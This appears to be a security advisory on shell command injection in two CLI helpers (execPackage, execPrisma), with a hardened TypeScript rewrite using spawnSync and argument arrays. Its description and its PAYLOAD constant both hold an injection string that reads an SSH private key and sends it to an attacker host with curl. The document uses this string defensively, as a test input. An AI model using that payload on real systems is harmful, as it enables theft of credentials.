Description
execPackage and execPrisma build shell command strings by concatenation and pass them to child_process.execSync, which hands the string to a shell. Any caller that passes user-influenced input (package names or Prisma CLI arguments derived from CLI arguments, config files, or schema names) therefore allows shell command injection: a package name such as "legit; curl attacker.com/exfil?d=$(cat ~/.ssh/id_rsa)" is interpreted by the shell as two commands, and the $(...) substitution is evaluated before curl even starts. Because this is a library with downstream consumers, the blast radius covers every consumer that calls these helpers without sanitizing first. The execPrisma path is the more concerning of the two, since its args may originate from a user-provided Prisma schema or from CLI flags. Quoting or escaping the interpolated values is not an adequate fix; the values should never reach a shell at all.
Severity: high
File: packages/cli/src/utils/exec-utils.ts
Expected Behavior
execPackage and execPrisma should not build a shell string. They should invoke the binary with an argument array via child_process.execFileSync or spawnSync (shell: false), so that each caller-supplied value is passed as a single argv element and shell metacharacters are inert. In addition, package names should be validated against npm naming rules and values beginning with "-" should be rejected or placed after a "--" separator, so that a value cannot be parsed as an option (argument injection, which shell-less spawning alone does not prevent). To confirm the fix, check that no remaining call site uses execSync with a concatenated or template-literal command, and that a payload like the one above reaches the child process as one literal argument.
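As an added example (this is not the project's exec-utils.ts; the helper names, the allowlist regexes and the use of npx are assumptions), the shape the hardened helpers could take: command arguments are kept as arrays, never joined into a string, package specs are validated against npm naming rules, Prisma flags are checked against a caller-supplied allowlist, and the advisory's payload is shown to arrive in the child process as one inert argument.

```typescript
// Added example; not the project's own code. Uses only Node's child_process API.
import { spawnSync } from "node:child_process";

// npm package name rules (lowercase, optional @scope/, no leading "-" "." or "_"),
// plus an optional @version-or-range suffix. A leading "-" cannot match, so a
// validated spec can never be mistaken for a CLI option. (Assumed allowlist.)
const PACKAGE_SPEC_RE =
  /^(@[a-z0-9][a-z0-9._-]*\/)?[a-z0-9][a-z0-9._-]*(@[A-Za-z0-9.^~<>=*+-]+)?$/;

export function isSafePackageSpec(spec: string): boolean {
  return spec.length <= 214 && PACKAGE_SPEC_RE.test(spec);
}

export interface Command {
  file: string;   // executable, resolved via PATH by spawnSync
  args: string[]; // one argv element per value; never joined or quoted
}

// Array equivalent of the vulnerable `"npm install " + pkg` string.
export function buildPackageCommand(
  pkgManager: "npm" | "pnpm" | "yarn",
  spec: string,
): Command {
  if (!isSafePackageSpec(spec)) {
    throw new Error(`refusing suspicious package spec: ${JSON.stringify(spec)}`);
  }
  const verb = pkgManager === "yarn" ? "add" : "install";
  return { file: pkgManager, args: [verb, spec] };
}

// Array equivalent of `"npx prisma " + args.join(" ")`. Without a shell, metacharacters
// are harmless; what remains is argument injection, so any element that looks like an
// option must name a flag the caller explicitly allows.
export function buildPrismaCommand(
  args: readonly string[],
  allowedFlags: readonly string[],
): Command {
  const out = ["prisma"];
  for (const a of args) {
    if (a.startsWith("-")) {
      const name = a.replace(/^--?/, "").split("=")[0];
      if (!allowedFlags.includes(name)) {
        throw new Error(`prisma flag not allowed: ${JSON.stringify(a)}`);
      }
    }
    out.push(a);
  }
  return { file: "npx", args: out };
}

export interface RunResult {
  status: number | null;
  stdout: string;
  stderr: string;
}

// shell: false is already spawnSync's default when an args array is given; it is
// spelled out here so a later "convenience" edit cannot silently flip it.
export function runCommand(cmd: Command, cwd: string = process.cwd()): RunResult {
  const r = spawnSync(cmd.file, cmd.args, {
    cwd,
    encoding: "utf8",
    shell: false,
    stdio: ["ignore", "pipe", "pipe"],
  });
  if (r.error) throw r.error;
  return { status: r.status, stdout: r.stdout, stderr: r.stderr };
}

// The payload from the advisory, used as a constructed test input.
export const PAYLOAD = "legit; curl attacker.com/exfil?d=$(cat ~/.ssh/id_rsa)";

// Runs the current Node binary (standing in for npm/npx) with the payload as one argument
// and returns what the child saw. With no shell involved, ";" does not split the command
// and "$(...)" is not expanded: the returned string is the payload, byte for byte.
export function demoPayloadIsInert(): string {
  const cmd: Command = {
    file: process.execPath,
    args: ["-e", "process.stdout.write(process.argv[1])", PAYLOAD],
  };
  return runCommand(cmd).stdout;
}
```

demoPayloadIsInert() is the check a reviewer can run against the patched helpers: if the child ever receives anything other than the literal payload, or if an extra process is spawned, a shell is still in the path.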